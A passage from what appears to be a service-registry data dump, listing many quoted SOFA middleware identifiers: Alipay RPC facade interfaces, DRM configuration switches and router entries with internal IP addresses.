AULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.ClientCacheRefreshSwitcher.refreshCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.198.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:offlinedatasyn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ifundcontrolmodel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.favor.api.InsCollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zskynetTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.biz.rest.TmallGenieHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthprod.facade.HealthGiftQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.core.service.scheduler.SchedulePointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IJobMigrateRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthprod.facade.HealthBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rmsdeploy.common.service.facade.AppAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ECSPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.pcard.VcpCardTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.GzoneDBUpdateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.serverless.test.facade.RpcTestService:1.0:arkbaseserverless-four-aigd1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyAppealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicreateweb.api.Team:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.coopr.common.service.facade.pkg.RuleInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.asset.statistics.service.utils.PortfolioUtil.portfolioDelayDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.trade.CashingInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finaggexpbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.voucher.TwoPhaseVoucherPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.AstcTransSettleDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuoteToolSignalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowRobotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.CertificateWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.product.file.FundDataCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.secdatacontext.common.facade.api.AssetsGraphViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.55.129.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.177.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mpa.common.service.finance.MpaSignQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantInterestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.ExternalDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.GroupInvitationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.134.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.canFinalCross,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.campaign.InsMktCampaignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.allTransBeginDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.debittrans.service.facade.aptrans.api.AptransCategoryCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.PublishService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.LabelOccupyQueryService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openctrl.facade.FcRuleGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:capacitystudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:malfunctionreplay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfcif.facade.customer.CustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.dsdc.SyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayUserBlackListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.214.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.appinvite.AppInviteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_RQ_Notify_4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopModifyExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.FlowOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetcenter.common.service.facade.api.DrmMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.instalment.facade.api.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.CBUMemberViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finadvisorbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:excoreSchedulerExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.meshyorg.common.service.facade.api.ApplyFacade:1.0:orgApplyFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.core.schduler.v2.api.data.InnerDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acspcore.common.service.Boss2ProductServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.wl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.LimitCaseVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.namelist.NameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetinsight.facade.api.diagnosis.TradePreferentialDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-insrobottwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:assetsMergeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.RegisterApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.intclcn.common.service.facade.AcrdVoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsearch.common.service.facade.api.blacklist.BlacklistManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mmtcaftscmdproc.common.service.facade.DeviceFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.archimedes.common.service.facade.api.ActiveStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.ReportFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agds.sd.facade.huabei.AgdsServiceFeeCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategySceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.app:name=com.alipay.fc.pdcore.core.service.adapter.drm.ProductSaleConfigDrm.realProductSaleQueryVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.RiskQuestionnaireFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.VerifyProductManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspricecore.common.service.facade.InsPriceCoreSaleActivityUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.file.utils.BtParameters.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.kyc.service.facade.KycQualifiedInvestorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-sffmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:taskModifyPunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:gzmshmp-pcsworkbench#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.0.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaimcenter.common.service.InsClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.light.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.LiveActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundDividendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.querysys.hbase.QuerySysFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkqafactory.facade.TestTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.core.service.task.TaskHandler:1.0:composeImgItemTaskCheckHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.AutoRefreshByJSONDRM.switch2JSON,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:rpc-route-rz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshynotify.common.service.integration.client.dingtalk.DingtalkServiceClient:1.0:actionCardMsgDingtalkServiceClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.SpmRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PRODUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.antquality.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradeguard.biz.tradepush.event.BizMoneyTransferResultEventHandlerForTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rds.common.service.facade.service.RdsTokenService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.shoppic.ShopPicManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_IACCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue33#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antpim.biz.service.facade.BizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.RecipientCommunityOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.biz.finfoservice.repository.TransactionRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.ZoneRuleDrm.blackAppList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AmActivityGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopenmng.service.facade.OfflineDeleteModelProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsPledgeFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RTCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.82.87.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:paygrowth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.app.service.facade.api.transfer.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.tinyapp.MstTinyappStatusDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.BusinessBaselineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.SeatAssetsFacade:1.0:orgSeatAssetsFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.v2.transfer.InvestTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@hello#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finfocore.common.service.facade.fop.api.mng.PackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.product.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.PasswordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.VoucherQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.meta.service.facade.api.OwnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.extensionexecutor.ExtensionExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdrmdata.heartbeat.url@DRM#@#DEFAULT_INSTANCE_ID#@#DRM","com.alipay.ifxtrade.common.service.facade.market.MarketDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.login.LogonPasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenReplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchstoreapp.shopcode.service.facade.api.ShopCodeBaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.transferprod.common.service.facade.api.TimingTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_ZC_TR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.opscore.common.service.facade.deployment.AppReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_BAHAMUT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.deployorder.VerifyResultFeedbackService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.docker.DockerApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.ApplyOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INSTTRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.126.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.service.facade.OrganizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@shendiao#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.120.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.msgopprod.common.service.facade.admin.TemplateMsgAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.manualRefreshTairCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:datariskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.test.SimpleService-10#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gftms.facade.api.basic.outer.FundDemandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_INSTANALYSIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superlink.service.facade.api.batch.BatchAsynSendService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pfunddts.service.dtm.service.CommonLocalCacheServcie:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.project.AcwProjectSceneQueryServiceRzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.smartFoRealSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antscheduler.facade.IActivityInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.DepartmentService:1.0:departmentService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.datariskmarket.facade.RmNotificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.DtManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataservice.common.service.facade.AccountLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.164.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientPerfMydrillConfigDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.metadata.ChangeMetadataApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.point.AddressQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.25.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.MerchantSubQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.mayibank.TerminationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.49.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.network.NetworkPlatFormGroupQueryService:1.0:securitydatacbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rds.common.service.facade.service.ProtoRdsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.api.contract.ContractCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_BOPS#@#DE